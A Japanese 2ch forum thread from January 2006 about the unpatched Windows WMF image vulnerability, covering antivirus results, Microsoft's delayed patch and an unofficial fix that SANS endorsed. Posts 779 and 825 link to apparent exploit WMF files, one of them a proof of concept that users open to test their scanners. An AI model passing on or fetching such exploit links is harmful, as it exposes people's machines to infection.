隔離ってのはユーザーがアクセス出来ないようにする措置だと思う。
で、圧縮ファイルの中のファイルはそもそも隔離処理がされるような状態じゃ無いんじゃない?
ノートンだと隔離されずに削除される。
圧縮ファイルの中のexeなんて起動しなきゃ悪いことは起こらんと思うよ。

で、ページが見られないウンヌンってのは、別の問題なんじゃ?
って、今見に行ったら、サイト鯖落ちてるだけなんじゃ?
最新ウイルス情報のページ、俺んところからも見えない(500error)

バスタでスキャンしたら発動なんてのは普通考えられないと思うよ。
んな事が起こったらバスタに高度の脆弱性が存在することになる。

700 :[名無し]さん(bin+cue).rar:2006/01/03(火) 09:44:52 ID:Y3ctF3+P0
ちなみに500Errorってのは向こうの鯖に問題が起きて正常に稼働してない状態。
エラーだったり高負荷状態だったり。

701 :[名無し]さん(bin+cue).rar:2006/01/03(火) 09:44:58 ID:bImlOFIa0
>>699
そうなのか、安心したよ。
朝から騒ぎ起こしてスマンね、そして今さらだがあけましておめでとう。

702 :[名無し]さん(bin+cue).rar:2006/01/03(火) 11:19:44 ID:kmTG2cN00
で、MSのパッチはまだなのかね?

703 :[名無し]さん(bin+cue).rar:2006/01/03(火) 11:25:24 ID:4aTYNnb30
早くパッチまだああああああああ

704 :[名無し]さん(bin+cue).rar:2006/01/03(火) 13:18:20 ID:OPPGxBq40
PentiumM(Dothan)ってNXbit対応のはずだけど、DEPの設定画面を見ると
「お使いのコンピュータのプロセッサでは、ハードウェアによるDEPはサポート
されません。ただし、DEPソフトウェアを使用することにより、・・・」って表示
されてるんだよ。
これでいいのかな?

705 :[名無し]さん(bin+cue).rar:2006/01/03(火) 13:33:14 ID:VF2mnAGZ0
>>688
動作不良報告されてるスレってどこ?

706 :[名無し]さん(bin+cue).rar:2006/01/03(火) 13:35:02 ID:MPwHM01T0
>>705
Windowsの脆弱性を突く画像ファイルが出現
http://news19.2ch.net/test/read.cgi/news/1136212496/87


707 :[名無し]さん(bin+cue).rar:2006/01/03(火) 14:17:54 ID:XYXbM+fO0
2006年01月02日Windowsのパッチ未公開セキュリティ・ホールをふさぐ“非公式パッチ”が公開
ttp://itpro.nikkeibp.co.jp/article/NEWS/20060102/226842/

708 :[名無し]さん(bin+cue).rar:2006/01/03(火) 14:20:01 ID:CU0Ekhmf0
昨日から、ビューワの
「このプログラムを閉じ、編集用に画像を開く」
を押しても何も反応しなくなった
今まではペイントが開いたんだけど

709 :[名無し]さん(bin+cue).rar:2006/01/03(火) 14:39:54 ID:sHjI7cAO0
>>708
ちょwwwwwwwww

710 :[名無し]さん(bin+cue).rar:2006/01/03(火) 14:41:47 ID:pJqBO4lk0
>>708
ありゃりゃ

711 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:00:29 ID:tOGTNJY90
米SANS Instituteは現地時間1月1日,Windowsに見つかったパッチ未公開の
セキュリティ・ホールをふさぐ修正パッチが公開されたことを明らかにした。
パッチは,マイクロソフトではなく第三者が作成した“非公式”なもの。
しかしながらSANSでは,このパッチの適用を推奨するとともに,同Webサイ
トで再配布している。

 パッチを作成したのはIlfak Guilfanov氏。パッチの適用対象は
Windows 2000,Windows XP(SP1およびSP2),Windows XP Professional 64bit。
SANSでは,現在出回っているセキュリティ・ホールを突くプログラム(ファイル)
に対して同パッチが有効であることを検証したとしている。

ソース:http://itpro.nikkeibp.co.jp/article/NEWS/20060102/226842/



サンGJ

712 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:23:58 ID:Y3ctF3+P0
Athlon64だと平気っぽいね。
一応対策したけど、対策してなくても電卓やメモ帳は起動しなかった。

713 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:26:14 ID:0qt8o4XI0
712激しく既出

714 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:28:24 ID:lXh2vqFe0
>>711
作ったのはSANSじゃないのでは?

715 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:29:36 ID:PCYq4hJh0
2003/06/10 22:33
     ,,-‐''""''ー--,_
  |"""        ||
  | .新共有ソフト. ||
  |  さ く ら た ん. ||
  |       ,ノ""""'||
  |   ,/"""       ||  ,   _ ノ)
  """"        .|| γ∞γ~  \
            / )|  / 从从) )
           / /||ヽ | | l  l |〃     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           | |_`从ハ~ ワノ)  n <  さくらたんの板です!
           \         \  ( E) \_________
         __  |   さくら / ヽ ヽ_//
         \   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\  
          ||\                \
          ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
          ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
             .||                  ||


716 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:32:00 ID:PHZNl18E0
>>714
そうなんだが、SANS保証付きの意義はある。そうしないと怖くて入れられん。

717 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:32:00 ID:0qt8o4XI0
>>714
検証したことについてのGJなのでは

718 :[名無し]さん(bin+cue).rar:2006/01/03(火) 16:51:43 ID:kcT2KeWR0
>>714
よく読め

719 :[名無し]さん(bin+cue).rar:2006/01/03(火) 18:46:17 ID:mwCmVqeg0
>>714
大人気だなw

720 :[名無し]さん(bin+cue).rar:2006/01/03(火) 18:50:34 ID:MX+AGqGN0
>>714の人気に嫉妬

721 :[名無し]さん(bin+cue).rar:2006/01/03(火) 18:54:37 ID:HUk09yE30
>>714
ただの勢いで意味なくカキコw

722 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:04:21 ID:4gm0o0tR0
>>714
うまく言えませんが、そんなあなたが好きです。

723 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:04:54 ID:oEE2nc6D0
>>714
ウラヤマシス

724 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:09:21 ID:4X+Nu9TR0
人気者の>>714がいると聞いて飛んできました

725 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:09:23 ID:s52Z/uh00
>>714
お断りだ

726 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:10:52 ID:shCIhvc30
くわっぱ全部お見通しだ>>714

727 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:13:34 ID:IaCt5Vax0
>>714
サンスだろ

728 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:20:07 ID:Ci6NQ+9c0
>>714
氏ね

729 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:23:17 ID:qrfcWcHJ0
>>714>>714

730 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:28:20 ID:shCIhvc30
>>714
バルス

731 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:40:27 ID:e/X76AHr0
>>714
よっ、人気者!

732 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:44:52 ID:8V/Wks+A0
>>714
空白すら入ってない orz

733 :[名無し]さん(bin+cue).rar:2006/01/03(火) 19:50:40 ID:B3coP3yp0
番組の途中ですが名無しです :2006/01/03(火) 19:41:18 ID:uV4N6Ddk0
公式サイト更新キタ…
Microsoft Security Advisory (912840)
http://www.microsoft.com/technet/security/advisory/912840.mspx

Microsoft has completed development of the security update for the
vulnerability. The security update is now being localized and tested to
ensure quality and application compatibility. Microsoft’s goal is to
release the update on Tuesday, January 10, 2006, as part of its monthly
release of security bulletins. This release is predicated on successful
completion of quality testing.

>release the update on Tuesday, January 10, 2006

MSは舐めてますか?

734 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:04:29 ID:orqKwUdB0
>>733
そのスレはどこにありまスレ?

735 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:06:14 ID:xUXjbLy80
10日までパッチでないってこと?

736 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:08:20 ID:orqKwUdB0
どうみても完全に舐め切ってます
本当にありがとうございました

737 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:08:26 ID:uOmuqScu0
変なメールも出始まったのに10日まで待たせるMSはさすがだな
とりあえず非公式パッチ入れておくか

738 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:08:26 ID:7Pj+arhf0
にゅうそく

739 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:09:58 ID:Bm3qUzmN0
>as part of its monthly release of security bulletins.
悠長なこった

740 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:13:49 ID:QAwUb9hE0
下々の人間がどうなろうと関係ないのだろうて

741 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:38:27 ID:pNuOaUOr0
マイクロソフトは脆弱性のためのセキュリティアップデートの開発を終了しました。
セキュリティアップデートは、現在、品質とアプリケーションの互換性を確実にす
るためにローカライズされて、テストされています。 マイクロソフトの目標は200
6年1月10日火曜日にアップデートをリリースすることです、毎月の担保解除報告の
一部として。 このリリースは品質検査の無事終了のときに叙述されます。

>2006年1月10日火曜日にアップデートをリリースしてください。


742 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:49:27 ID:4aTYNnb30
MSの対応の遅さには驚いたね
まさかここまでとは

743 :[名無し]さん(bin+cue).rar:2006/01/03(火) 20:59:36 ID:nCNzK5kk0
いや、あんまり急ぐとそれはそれで問題があったりする。
痛し痒しってやつだな。

744 :[名無し]さん(bin+cue).rar:2006/01/03(火) 21:28:58 ID:8+OZIA0s0
いろんな状況での検証しないといけないからな

745 :[名無し]さん(bin+cue).rar:2006/01/03(火) 21:35:15 ID:8lg6AzfT0
余計な機能をつけて深刻な脆弱性
と俺はとらえているんだが

勘違いならすまん

746 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:23:42 ID:MPwHM01T0
この脆弱性は、WIN16 時代の過去の古い機能の脆弱性だから、MSとしては、
互換性を犠牲にしてくるんじゃね? それが手っ取り早い。
今の時代、wmf なんて表示できなくても誰も困らないべさ。

747 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:24:59 ID:M+ecqsjN0
たしかに俺も困らないけど、誰も困らないと決めつけるのはよくない

748 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:27:17 ID:ZVEOq1H60
Office系のクリップアートはWMFだかんなぁ
そう簡単にヤメにできないでしょ。糞ゲイツも

749 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:28:59 ID:cQF3eqOd0
感染者からの報告ってあるの?

750 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:30:17 ID:4WtAqYps0
そろそろ新フォーマット提供汁って神のお告げだな
視覚効果や糞機能重視で、自分勝手な仕様のOSなんざ作りやがって、と。

751 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:30:44 ID:M+ecqsjN0
脆弱性の感染者って何よ?

752 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:30:56 ID:e/X76AHr0
MSだめぽだな。
非公式パッチ入れよ。

753 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:32:17 ID:IPxS1fzA0
本当にフォーマット:Cできて被害者続出したら面白いのに

754 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:35:32 ID:4gm0o0tR0
ν速のスレに動画のリンクあったね、wmf開いちゃった人の

755 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:38:31 ID:N0YrFczs0
その駄目なOSにしがみついてるのが俺らだけどな

756 :[名無し]さん(bin+cue).rar:2006/01/03(火) 22:40:28 ID:MfXa7DBi0
>>755
鈴木さんお疲れ様です。

757 :[名無し]さん(bin+cue).rar:2006/01/03(火) 23:11:31 ID:RqlmMGFn0
んで非公式パッチってどうやって入れた後にMSのパッチと入れ替えればいいの?

758 :[名無し]さん(bin+cue).rar:2006/01/03(火) 23:24:07 ID:nQxDHTIF0
今年始まったあたりから回線速度が半分近くまでがた落ちしてるんだけどこれはウィルスのせいなのか一時的なものなのか。
同じ状況の人はいないかな。
ちなみにヤフビ12M。

759 :[名無し]さん(bin+cue).rar:2006/01/03(火) 23:26:21 ID:M+ecqsjN0
>>758
スレ違いの可能性高し

ISP規制情報報告スレ Part24
ttp://tmp5.2ch.net/test/read.cgi/download/1135336863/

760 :[名無し]さん(bin+cue).rar:2006/01/03(火) 23:34:20 ID:tOGTNJY90
>>757
「プログラムの追加と削除」からアンインスコ

761 :[名無し]さん(bin+cue).rar:2006/01/03(火) 23:34:57 ID:RqlmMGFn0
>>760
thx

762 :[名無し]さん(bin+cue).rar:2006/01/03(火) 23:43:30 ID:8TJEpEFQ0
もろよわ性を10日まで待てってコトダナ

763 :[名無し]さん(bin+cue).rar:2006/01/03(火) 23:50:16 ID:6kEz2Hrb0
firefoxで画像ひらく分にゃ問題ないでFA?

764 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:00:08 ID:F1zcZPBC0
非公式パッチって
ここの→http://www.hexblog.com/2005/12/wmf_vuln.html
これであってるかな?→http://www.hexblog.com/security/files/wmffix_hexblog14.exe

765 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:03:43 ID:6aoG1QcM0
わ、またパッチがバージョンアップしてる。面倒だなぁ

766 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:08:02 ID:LjQd+kj3O
くぉらゲイツ!
ヒサシブリにシステムの完全スキャンしたら、ノートン先生がbloodhoundを2コも見つけてきたぞ!!

削除できずに検疫するんだとよ!!





・・・他にもなんかいたらヤだから・・・ただ今再インスコ中・・・orz

767 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:09:55 ID:qlisr2J00
>>763
firefoxはIE依存じゃないから大丈夫なんじゃない?
用はエクスプローラーの脆弱性を使わないようにして画像なりを閲覧すればおk。
プログラムをインスコしそうになったら警告を出す設定にするのも、当たり前に。

圧縮ファイルは開く前に対応しているアンチウイルスソフトでスキャン。

この手の対策って、すでに普段から当たり前にとっているから、オレはまったく関係ない話だったり。

768 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:13:53 ID:5RTvhr390
>>767
完全に安心はできないってあっちこっちで言われてますが

769 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:15:37 ID:t7LJetPl0
>ノートン先生がbloodhoundを2コも見つけてきたぞ
電卓とメモ帳じゃね?

770 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:33:55 ID:6aoG1QcM0
>>769
俺それで一瞬びびった

771 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:51:00 ID:qlisr2J00
>>768
検体のリンクというのがN+にあったけど、firefoxで画像を踏んでもヘンなプロセスは
発生しなかったよ。

なんにせよ、ウイルスがこの脆弱性を利用できるのは10日まで。

772 :[名無し]さん(bin+cue).rar:2006/01/04(水) 00:56:19 ID:y0ar6KwK0
>>763
>>771
さんくす。

773 :[名無し]さん(bin+cue).rar:2006/01/04(水) 01:01:51 ID:KJQqcDr90
>>754 見つかんない URL張って

774 :[名無し]さん(bin+cue).rar:2006/01/04(水) 01:53:05 ID:zSNg/ZOW0
>>771
10日までおよそ1週間に、バックドア仕込むとか、時限発動もの仕込むとか何でもできるわけだが…
Googleのイメージ検索でもヒットするからなぁ。最低限、非公式パッチ当てないとかなり怖し

775 :[名無し]さん(bin+cue).rar:2006/01/04(水) 02:08:22 ID:XLaiHzFO0
超絶被害まだー???

776 :[名無し]さん(bin+cue).rar:2006/01/04(水) 02:16:27 ID:BW6YbLJP0
本当の地獄は明日の仕事初めからだ

777 :[名無し]さん(bin+cue).rar:2006/01/04(水) 02:23:44 ID:0DlDY8Mb0
777
ドクロage

778 :[名無し]さん(bin+cue).rar:2006/01/04(水) 04:06:19 ID:dLWdnfUp0
451 名前: 番組の途中ですが名無しです [] 投稿日:2006/01/03(火) 17:16:45 ID:uV4N6Ddk0
Websense Security Labs Blog
http://www.websensesecuritylabs.com/blog/

Below is an attached video of a machine being infected with all the
components. As you can see several pieces of Potentially Unwanted
Software (P.U.S) are installed and by simply viewing the MWF image
you are infected without a prompt or warning screen.

This is an example of how P.U.S. (AKA "Greyware") vendors are using
known and unknown exploits combined with deception to install code.

http://www.websensesecuritylabs.com/images/alerts/wmf-movie.wmv

やられたマシンの動画みつけた
((((;゚Д゚)))ガクガクブルブル

779 :[名無し]さん(bin+cue).rar:2006/01/04(水) 04:36:23 ID:jy9++T4I0
>>778
スパイウェアを自動的に駆除してくれるのか。親切だなw
http://beehappyy.biz/parthner3/xpl.wmf

780 :[名無し]さん(bin+cue).rar:2006/01/04(水) 05:33:16 ID:EdcwcKle0
>>670
そういう書き込みやコピペするとMicrosoftから警告や告訴されるって知らんのか

781 :竹山:2006/01/04(水) 06:13:28 ID:W9XJuCqQ0
えてこますぞ!!!!!!!

782 :[名無し]さん(bin+cue).rar:2006/01/04(水) 07:08:03 ID:oCfG0rKa0
はいはいエテコマサレタエテコマサレタ

783 :[名無し]さん(bin+cue).rar:2006/01/04(水) 07:12:20 ID:0DlDY8Mb0
モマイラはsans再配布の非公式パッチ当ててるの?

784 :[名無し]さん(bin+cue).rar:2006/01/04(水) 07:51:26 ID:gW8PFWXT0
とっくに当てとる。SANS認定なら、まぁ大丈夫かと。
ゲイツ待つなら10日になるしな。

785 :[名無し]さん(bin+cue).rar:2006/01/04(水) 07:53:31 ID:Y9GuA4zp0
SANSのパッチ当てた後、綺麗に暫定パッチを削除できるのかな?

786 :[名無し]さん(bin+cue).rar:2006/01/04(水) 08:00:21 ID:nxAc853Q0
MSパッチが出るまで、画像関連の拡張子に IrfanView を指定してはいけない。
無敵ウィルスは亜種がかなり簡単に作れて、しかもワクチンが反応しないぞ。

787 :[名無し]さん(bin+cue).rar:2006/01/04(水) 08:16:00 ID:RDPu4uPz0
ウィルスソフトだけだと不十分なのけ?
パッチも必要?

788 :[名無し]さん(bin+cue).rar:2006/01/04(水) 08:16:46 ID:RDPu4uPz0
>>786
あ、ウィルスソフトでは不十分なんか

789 :[名無し]さん(bin+cue).rar:2006/01/04(水) 08:18:56 ID:QcZ8r4bQ0
ウイルスソフトってなんですか?
rootkitとかの事ですか?

790 :[名無し]さん(bin+cue).rar:2006/01/04(水) 08:20:55 ID:avykmx970
Wind○wsMe

791 :[名無し]さん(bin+cue).rar:2006/01/04(水) 09:04:18 ID:nxAc853Q0
>>787
手元に mmc.exe を起動するだけの wmf があるんだけど、VB2006 は検出せず。
ewido 試用版は検出してくれました。

792 :[名無し]さん(bin+cue).rar:2006/01/04(水) 09:19:57 ID:/sbACeHu0
パッチのサイト、停止中?

793 :[名無し]さん(bin+cue).rar:2006/01/04(水) 09:37:32 ID:oCfG0rKa0
アンチウイルスソフトをあまり信用しすぎるなってことだな。
特に今回のような脆弱性が発見された時はな。
ウイルスやトロイを撒くヤシらはまずノートンに検知されないのを確認してからサイトに
仕掛けたりメールに添付する。

簡単に亜種が作れる場合、普段なら出回ったものをバラ撒くだけだったヤシも亜種を作
ったりする。
作るヤシが多くなり亜種が増え、アンチウイルスソフトの対応は後手になる。

レジストリやスタートアップを監視できる砂箱を導入すると危険は減るかもしれない。
物凄く面倒になったりするが。

794 :[名無し]さん(bin+cue).rar:2006/01/04(水) 10:14:17 ID:W/VW3M5p0
1月10日に公開予定。このパッチは現在品質およびアプリケーション互換性を確認中。
ttp://www.itmedia.co.jp/enterprise/articles/0601/04/news004.html

795 :[名無し]さん(bin+cue).rar:2006/01/04(水) 10:18:41 ID:XLaiHzFO0
攻撃の規模は限定的なものだってなんやねん

796 :[名無し]さん(bin+cue).rar:2006/01/04(水) 10:20:02 ID:d/Qj9bZ70
Windows限定

797 :[名無し]さん(bin+cue).rar:2006/01/04(水) 10:29:45 ID:EZipI1JL0
[(´・ω・)カワイソス] (**設計) 200407月**VAV8温度.xls
ってのが、キャッシュに残ってたんだが、新種?
がいしゅつ?


798 :[名無し]さん(bin+cue).rar:2006/01/04(水) 10:52:57 ID:EZipI1JL0
[(´・ω・)カワイソス] (所*市立上**小学校) がんばりカード.doc
地引きすると がんばりカードが


799 :[名無し]さん(bin+cue).rar:2006/01/04(水) 10:56:43 ID:0cKqmxxO0
>>797-798
二つとも拡張子が無視リストに入ってら。


800 :[名無し]さん(bin+cue).rar:2006/01/04(水) 11:45:25 ID:JLGanqgb0
グロ画像をサムネで見ると、削除できなくなるのはウィルス?
再起動すれば削除できるんだけど。

801 :[名無し]さん(bin+cue).rar:2006/01/04(水) 12:11:17 ID:1gy4huoN0
どこかのプロセスが使用したままで消せないって奴じゃ?

802 :[名無し]さん(bin+cue).rar:2006/01/04(水) 12:13:17 ID:JLGanqgb0
>>81
そう!それ!
ctrl+alt+delで強制終了しようとしても
どのファイルが使用中なのかわからないからどうしようもない。

803 :[名無し]さん(bin+cue).rar:2006/01/04(水) 12:28:08 ID:XN+ZVFyQ0
質問する前にwikiをチェックしろよ

804 :[名無し]さん(bin+cue).rar:2006/01/04(水) 12:29:47 ID:dLWdnfUp0
グロ画像を何で見たのか
毎回グロ画像が削除出来ないのかよくわからんが
Unlocker
ってソフト使うといいよ。
結構便利。

805 :[名無し]さん(bin+cue).rar:2006/01/04(水) 12:47:15 ID:JLGanqgb0
>>804
画像閲覧ソフト入れてないXPだから
zipファイルは解凍してからじゃないと見られない。
で、解凍してからフォルダ開くとサムネでグロが表示される。
急いでフォルダ閉じて、フォルダごと削除しようとすると>>801みたいなメッセージが表示されて
再起動しないと削除できなくなる。
unlocker使ってみる

>>803
チェックしてなかった。すまん。



806 :[名無し]さん(bin+cue).rar:2006/01/04(水) 12:54:55 ID:53qkDmzw0
何を見てもグロが表示されるのなら面白かったのに

削除選択してプロセス使用中メッセージが出るか出ないかのうちにタスクマネージャから
グロファイルのある場所終了させてもう一度削除を選べば消せる。と昔学んだ。

807 :[名無し]さん(bin+cue).rar:2006/01/04(水) 12:57:56 ID:JLGanqgb0
>>806
ちょっとそれレベル高いな。そんな素早い行動をグロ画像削除のためにやる気にはなれない。
が、試してみるよ。ありがとう。

808 :困ったさん:2006/01/04(水) 13:30:38 ID:gQNBJlkf0
急にwinnyでダウンロード出来なくなりました。動いている気配がないのです。どうすればいいのでしょうか?誰かご存知ですか?



809 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:32:07 ID:ay0hThBU0
いい機会だから足を洗う

810 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:32:17 ID:gkAmzWa30
働けば良いと思うよ

811 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:35:24 ID:ZUkskRIe0
>>808
知らんがな(´・ω・`)

812 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:37:31 ID:LLCN6uE40
非公式バッチのサイト落ちた(´・ω・)ス?
アクセス集中したせい(´・ω・)スカネ

813 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:39:23 ID:ay0hThBU0
バッチとパッチ間違う人多いよな

814 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:47:24 ID:6aoG1QcM0
そうそう、パッチはももひきのことだからな

815 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:51:41 ID:BBOVYZTp0
pachとbatで考えると間違わないんだけど

816 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:57:24 ID:BBOVYZTp0
>>815
あ、tが抜けてた…

817 :[名無し]さん(bin+cue).rar:2006/01/04(水) 13:59:35 ID:Ree6ZARM0
bat恐怖症な俺になんてことを・・・


818 :[名無し]さん(bin+cue).rar:2006/01/04(水) 14:05:11 ID:8PzTzluA0
まとめると ちんぽっぽ ってことでおk?

819 :[名無し]さん(bin+cue).rar:2006/01/04(水) 14:06:20 ID:Up8G0HHV0
ここって前からこんな雰囲気だったっけ?

820 :[名無し]さん(bin+cue).rar:2006/01/04(水) 14:10:30 ID:+NZM0yK40
><

821 :[名無し]さん(bin+cue).rar:2006/01/04(水) 14:10:43 ID:AmX+4tLL0
今回の騒ぎでVIPPERが住み着いてしまったのかもしれん

822 :[名無し]さん(bin+cue).rar:2006/01/04(水) 14:41:16 ID:J0EksrPo0
690 名前:以下、名無しにかわりましてVIPがお送りします[sage] 投稿日:2006/01/04(水) 14:29:47.75 ID:l5p1aZiC0
確かにファイアーウォールは抜かれるかもしれんがアンチウィルスソフトで削除すればいいだけだし
騒いでんのは馬鹿だけ

695 名前:以下、名無しにかわりましてVIPがお送りします[sage] 投稿日:2006/01/04(水) 14:40:23.55 ID:l5p1aZiC0
>>691
バスターやノートンで削除できないウィルスなんて新型だけ
99パーセント感染しないし
対応までにシステムが破壊されるようなウィルスなんてそうそう無いし
飛行機が墜落するのを心配するようなもんだ

823 :[名無し]さん(bin+cue).rar:2006/01/04(水) 15:32:48 ID:CAaaFixq0
(ノ∀`) アチャー

824 :[名無し]さん(bin+cue).rar:2006/01/04(水) 15:39:51 ID:BW6YbLJP0
ある意味幸せなやつだ

825 :[名無し]さん(bin+cue).rar:2006/01/04(水) 15:44:55 ID:/uqWbh8n0
http://news19.2ch.net/test/read.cgi/news/1136212496/

695 名前:番組の途中ですが名無しです[sage] 投稿日:2006/01/04(水) 14:02:36 ID:xU6hB9Wn0
スクリーンキーボードが起動するwmf作ってみた
ttp://caspian.s33.xrea.com/images/runosk.wmf
BitDefenderでスキャンかけてもウィルスと認識しない

696 名前:番組の途中ですが名無しです[sage] 投稿日:2006/01/04(水) 14:03:34 ID:GgOd1bUu0
>>695
avast!が普通に検出したんだけど

700 名前:番組の途中ですが名無しです[] 投稿日:2006/01/04(水) 14:08:07 ID:78jupe5i0
>>695
バスター反応しねえええええええええ

701 名前:番組の途中ですが名無しです[sage] 投稿日:2006/01/04(水) 14:09:58 ID:ekbuK5O40
>>695
AVGもぬるー

826 :[名無し]さん(bin+cue).rar:2006/01/04(水) 15:49:42 ID:cEskEM6R0
>>825
BD反応

827 :[名無し]さん(bin+cue).rar:2006/01/04(水) 15:51:57 ID:xajoBmy30
脳豚反応しねー

828 :[名無し]さん(bin+cue).rar:2006/01/04(水) 16:00:08 ID:gW8PFWXT0
どうでもいいけど、いちいち踏んでやるオマイらヌルすぎ。2chだぞ。

829 :[名無し]さん(bin+cue).rar:2006/01/04(水) 16:17:31 ID:yQ9BMkDM0
>>825
確かにavast!反応した

830 :[名無し]さん(bin+cue).rar:2006/01/04(水) 16:20:55 ID:8Ark7Iia0
BD最新定義だと反応するみたいだね
avast!最強

831 :[名無し]さん(bin+cue).rar:2006/01/04(水) 16:29:24 ID:ZUkskRIe0
>>828
激しく同意なんだけど案外少数派みたいだよね・・・


832 :[名無し]さん(bin+cue).rar:2006/01/04(水) 16:30:00 ID:1RdqJUQb0
>>825は非公式パッチ当ててるとどうなるの?

833 :[名無し]さん(bin+cue).rar:2006/01/04(水) 16:40:59 ID:/5Q6I9H90
画像とfaxビューアが起動して「見れません」と出るだけ

834 :[名無し]さん(bin+cue).rar:2006/01/04(水) 17:26:57 ID:KAMAp8Za0
>>825
VB2006は華麗にスルー。
>>833と同じ症状。

835 :[名無し]さん(bin+cue).rar:2006/01/04(水) 17:40:47 ID:P8PEGWFr0
感染した!
ぐーぐる文字がおかしなことに!

836 :[名無し]さん(bin+cue).rar:2006/01/04(水) 17:51:40 ID:d22cegjC0
オレオレモ

837 :[名無し]さん(bin+cue).rar:2006/01/04(水) 17:52:23 ID:/b3uM9OV0
俺漏れも!

838 :[名無し]さん(bin+cue).rar:2006/01/04(水) 17:52:43 ID:TT2aK/gD0
アストロンは感染しないってまじですか?ラッキー♪
ペンティアムは氏んでろよwwwww

839 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:01:02 ID:X2bWzNzr0
>>835-837
答え:点字

840 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:09:01 ID:GuvU3vw90
誰か>>838を翻訳してくれ

841 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:10:35 ID:YS/cXs5R0
ちょーうw ググル先生が点字に・・・orz
どうなってんのよー

842 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:12:18 ID:P8PEGWFr0
>>839
マジレス!?
いやぁぁぁ!!

843 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:22:33 ID:53qkDmzw0
触れない点字なんて(゚听)イラネ

844 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:39:48 ID:tprDQQ9n0
チャレンジャーだなおまえら

845 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:50:12 ID:PF7i0wcv0
>>825
非公式パッチ当ててないがNOD32反応

846 :[名無し]さん(bin+cue).rar:2006/01/04(水) 18:52:36 ID:nxAc853Q0
ググルの点字画像の中に、死兆星が見える奴は、今年中に死ぬ。

847 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:06:09 ID:KAMAp8Za0
googleどうしたよw
さわれない点字なんて意味ないじゃんか。

848 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:09:19 ID:OACtBZHm0
>>840
鉄になるから最強

849 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:11:56 ID:X2bWzNzr0
>>848
不覚にもワロタ

850 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:26:08 ID:wR3bmEKQ0
点字対応のディスプレイってあるらしいじゃん。
もっこりしてくるやつ。

851 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:28:21 ID:7fxrhhBv0
でも、グーグルで何を検索するんだ?
点字表示のサイトなんてあるのか?

852 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:28:39 ID:rf/n2RPt0
目が見えない人でも、夢をみるのか?
http://cocoa.2ch.net/body/kako/1004/10043/1004374543.html

これ名スレ

853 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:34:53 ID:7fxrhhBv0
>>852
うお、懐かしい・・。
二年ぐらい前に読んだ記憶がある。

そっかぁ、読み上げてくれるソフトがあるんだな。

854 :[名無し]さん(bin+cue).rar:2006/01/04(水) 19:46:00 ID:wR3bmEKQ0
>>852
感動した。目が見えなくてもネットに繋がれるってのがSFチックだな。

855 :[名無し]さん(bin+cue).rar:2006/01/04(水) 21:31:44 ID:Vv4NIjj10
